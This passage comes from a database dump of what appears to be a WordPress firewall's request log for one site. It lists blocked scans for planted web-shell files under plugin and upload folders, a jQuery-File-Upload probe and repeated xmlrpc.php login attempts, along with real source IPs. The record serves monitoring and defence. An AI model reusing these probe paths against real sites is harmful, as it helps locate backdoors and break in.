Safari\\/537.36\",\"2\":\"www.google.com\"}','6sLKOIv25Z49VYJe8RPtFH0u',0,1680471022.5040,277,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','FoWSJ3KPNgEmxTcf1Z2iwOHe',0,1680471020.5929,290,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','yVQIjCmdtfAYGpe37cohHP64',0,1680471018.6818,308,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/plugins/apikey/apikey.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uLatgr4vyM3BQF7ZD06eISkw',0,1680471017.7120,339,'','POST',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','JYAaXKgC2Rm1vhi0FuNk9rTe',0,1680471016.7629,344,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/admin/global/plugins/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','4TUYk8yVl3EsX0n2WPGfNaOz',0,1680514648.1224,1757,'','GET',403,0,700,0,1,'',0),('194.113.235.169',3262245801,'','http://cmdev-site1.com/1.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\",\"2\":\"http:\\/\\/cmdev-site1.com\\/1.php\"}','ZXqGjBIOSpRuWz382QTJdvFo',0,1680511190.4585,690,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/admin/assets/plugins/jQuery-File-Upload/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','Ae4Flk5wUcIpVdmhoOHsNDMG',0,1680513700.0052,350,'','GET',403,0,700,0,1,'',0),('159.223.49.95',2682204511,'','http://cmdev-site1.com/administrator/index.php','','{\"1\":\"python-requests\\/2.27.1\"}','lnTIH2efSqmM17YBrNhCZ85K',0,1680547241.1173,324,'','GET',403,0,700,0,1,'',0),('108.167.56.152',1822898328,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36 Edg\\/111.0.1661.62\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-plugin-upgrade&reauth=1\"}','gDIUCceSYnx098KzWjiTkHEo',1,1680562743.7710,393,'','POST',302,0,600,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/?et_fb=1&et_bfb=1&PageSpeed=off\"}','X8954gPn6wHvr1StiDKZBkpG',0,1680612415.8551,2112,'','POST',200,0,500,0,1,'',510),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/post.php?post=138&action=edit\"}','rZQfoutOAJx8pw7SelGy4jVU',0,1680612415.8546,1305,'','POST',200,0,500,0,1,'',510),('213.152.161.69',3583549765,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NrfYHyeOibGDEIov7g4skF6h',0,1680675477.1254,710,'','POST',403,0,515,0,1,'',0),('213.152.161.69',3583549765,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NXcylVk6tbn1mpDhLuEU02C8',0,1680706913.6291,3662,'','POST',403,0,515,0,1,'',0),('213.152.187.235',3583556587,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EpQXYZSL3g8jW6bkFcAMIe0C',0,1680708238.8875,1232,'','POST',403,0,515,0,1,'',0),('91.207.57.115',1540307315,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ghtQbyMDJqavorL3ZlFHUAGm',0,1680791155.4061,3488,'','POST',403,0,515,0,1,'',0),('213.152.186.40',3583556136,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Ib4ktvplZxVEz6Kiu0C7LG9q',0,1680792371.4254,4324,'','POST',403,0,515,0,1,'',0),('20.40.54.253',338179837,'','http://cmdev-site1.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','v3AdyhKSVeM0ZgX5ca8Ttnoi',0,1680800500.4561,1403,'','POST',403,0,700,0,1,'',0),('213.152.187.195',3583556547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','MlBAewsiJC9mWoypZuYL5bFx',0,1680815759.6601,1684,'','POST',403,0,515,0,1,'',0),('103.179.190.218',1739833050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','fxcYHRP24FNKSW6vrIG9luMg',0,1680842773.4532,2308,'','POST',403,0,515,0,1,'',0),('194.187.251.91',3267099483,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aYXqjb0z9MGlOSPTFWonvNCH',0,1680842582.6501,3681,'','POST',403,0,515,0,1,'',0),('134.19.179.163',2249438115,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qCorvBfpJ6lKNGDmA7MzULQ9',0,1680882577.9093,3866,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','cIf4CdPiZD6BsHSgaK1M3w5u',0,1680880622.9499,558,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','cXPQaYTpmdf5ojqv8VZEACnr',0,1680880616.6091,591,'','POST',403,0,515,0,1,'',0),('139.162.104.127',2342676607,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','NYActHC4nU8yfLsVjpFRwM35',0,1680880618.7348,556,'','POST',403,0,515,0,1,'',0),('124.6.63.132',2080784260,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2eXN7IY8fRK1nzWuV6T9ZjSp',0,1680880606.4687,789,'','POST',403,0,515,0,1,'',0),('173.231.231.50',2917656370,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','mqEUp2Zwo5yOKSeMaF4ldriG',0,1680880605.2889,1466,'','POST',403,0,515,0,1,'',0),('216.128.130.149',3632300693,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','7HjD98A02WBhgV6bt1KxzGYl',0,1680880590.1033,591,'','POST',403,0,515,0,1,'',0),('116.118.51.5',1953903365,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','kiJeMHnAdQtaK1LGrjoC250w',0,1680880604.9489,1205,'','POST',403,0,515,0,1,'',0),('198.54.114.123',3325457019,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','z4AXSg5bnCOo7i6rQVNDxJdm',0,1680880587.3472,661,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','4IBwEMJf1Cz2sx9qFVeLhWg6',0,1680877677.1858,522,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','jaW63PSFTm5siUJ2qCwNDIlO',0,1680877672.2346,553,'','POST',403,0,515,0,1,'',0),('34.95.136.51',576686131,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','JcakXqMF2fYiz7yxQohDPLEV',0,1680877670.4528,548,'','POST',403,0,515,0,1,'',0),('178.210.67.162',3000124322,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','d05eIGjEHyN6FzguKil3UnRf',0,1680877661.2032,579,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','o8sWGbU6VnBExFvTaZCyjwmS',0,1680877659.7702,558,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','J5BfX9ZFQmVWhNG0pkDnytiS',0,1680877656.4344,576,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','trOKoczxUW26LZDAJi8Q0hnu',0,1680877650.5155,542,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','6Y10OLU5cr8bWIyf9QxdjCRT',0,1680877645.1266,552,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','7UlPyKsODk4w25eNYdJIazCf',0,1680875988.9255,568,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','HOhiDl4xvB2MWP5tIJSVGRu9',0,1680875985.5495,561,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','92ku04zRKvZG6AVrptCSLDBi',0,1680875983.2316,581,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','oxBpXYlb4nqOtwWfHNdGcvTZ',0,1680875976.5519,574,'','POST',403,0,515,0,1,'',0),('51.178.95.118',867327862,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','o3IlbNSY4mV67GFLrKyUJh5M',0,1680875974.9399,595,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','k8o9FdMyvO0IcrsBRz2Tu3Hb',0,1680875965.1856,659,'','POST',403,0,515,0,1,'',0),('3.231.146.243',65508083,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','BE2CvgmVU7cnFRTzOkSL9lIr',0,1680875958.9065,581,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Pfa3bBVUroFNt7RZE2nuMmjx',0,1680875957.9565,558,'','POST',403,0,515,0,1,'',0),('45.77.175.167',760065959,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','MJ1B7uHck4SnCL5N6YjQgqsD',0,1680875954.9899,643,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ghq3I6yCZjHUFRtNbTAYnEJX',0,1680875043.2227,881,'','POST',403,0,515,0,1,'',0),('141.98.102.179',2372036275,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','eutcJHl9Lg2IkDj1TsdGVK6Q',0,1680873793.7986,1223,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3JVuz9eIMgQyYUZ5OixwsHk1',0,1680874726.9800,633,'','POST',403,0,515,0,1,'',0),('185.156.174.115',3114053235,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GbS6rdBt5xqHVhwCDYFevW7a',0,1680872974.4306,3513,'','POST',403,0,515,0,1,'',0),('141.95.34.230',2371822310,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','mNfB8xCPwiWH70IbZTUeAS1u',0,1680876007.8619,647,'','POST',403,0,515,0,1,'',0),('64.42.179.59',1076540219,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','wBCnXtPjLWQKSlE0HcORr12M',0,1680876362.8069,1693,'','POST',403,0,515,0,1,'',0),('51.79.177.175',860860847,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','74NVUvn9gSFKRZb6isTW85zr',0,1680877643.6272,602,'','POST',403,0,515,0,1,'',0),('31.3.152.100',520329316,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Dax4JgOWHZneIL01d59Vc6wX',0,1680883363.2004,613,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','MNz2TgpEXxcowDmFOkQGJ1Al',0,1680883613.4810,2757,'','POST',403,0,515,0,1,'',0),('68.178.145.190',1152553406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','Gy5U8ho1wfaDM3q0uYEJXBrR',0,1680894921.5591,2929,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','IDf2NUmAWoytgPXShal7ZFO8',0,1680894929.9151,629,'','POST',403,0,515,0,1,'',0),('213.152.187.220',3583556572,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pMxaOHX9CVetYF0ig4KQNBfq',0,1680915856.8171,733,'','POST',403,0,515,0,1,'',0),('134.19.179.211',2249438163,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dXWit8z1Q0sFuDgLC4lwOTMa',0,1680916161.2925,3492,'','POST',403,0,515,0,1,'',0),('74.208.57.218',1255160282,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','mS86HP7KRq1WOtJFIv2M3BQu',0,1680941392.3872,1305,'','POST',403,0,515,0,1,'',0),('103.191.76.155',1740590235,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','paovJ2TjZDVmdXyFAPh1QOci',0,1680941366.9917,548,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','uvM3RkqcKjGZn91LbVxfyErI',0,1680941366.2119,600,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','rMpK0cxLQ6g2JktGAaWu1mSl',0,1680941355.1359,3464,'','POST',403,0,515,0,1,'',0),('103.9.227.178',1728701362,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','vbWaX9Ht76gnwSfQMxezCiRo',0,1680941365.3166,620,'','POST',403,0,515,0,1,'',0),('213.152.187.215',3583556567,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kKRFr94ysMB01qeJmn3uQiSN',0,1680944466.6227,3727,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/wp-admin/admin-ajax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/wp-admin\\/upload.php\"}','Ih3uKs6SgF5C2GJZykNDYPXH',0,1680957638.1485,1571,'','POST',200,0,500,0,1,'',510),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','M9RXjkHSW4F7IzbvBpUJtox2',0,1680968008.2578,2005,'','POST',403,0,515,0,1,'',0),('182.92.129.110',3059515758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','7TnhIdYAREcsQkSe6jgGMatO',0,1680968007.9389,1930,'','POST',403,0,515,0,1,'',0),('198.54.114.123',3325457019,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','rslwQGWhF4I0bE9JPoqZNV3U',0,1680967998.8436,663,'','POST',403,0,515,0,1,'',0),('54.38.242.51',908522035,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','hVl6nuk5CmFBD1jUrwAxp4vE',0,1680967997.3340,597,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','trkOvIUFwEShqBnbyofL215P',0,1680967993.7415,602,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','irfNk9q7MsZCYWvoAcKwLHIF',0,1680967984.6817,617,'','POST',403,0,515,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sULERCH9mZxr7tFSzAwc4Bg1',0,1680967273.3055,642,'','POST',403,0,515,0,1,'',0),('146.70.115.219',2454090715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','o4UfurM9eFxBOwacEmKCRNsA',0,1680967663.9386,759,'','POST',403,0,515,0,1,'',0),('207.154.253.117',3483041141,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','0KmzBWUgFnfq9t1hrYucEVv8',0,1680972637.0636,729,'','POST',403,0,515,0,1,'',0),('185.200.116.203',3116922059,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','WZiz8sTa3lRXrhfAnmQg1Cbo',0,1680971904.8527,4084,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','GsJQchIU2LFP4Bu8ZYDmS7A3',0,1680972633.3271,1570,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QWF4gaJvO8pRq1NcIPwelSYy',0,1681038974.3274,562,'','POST',403,0,515,0,1,'',0),('178.162.204.238',2997013742,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 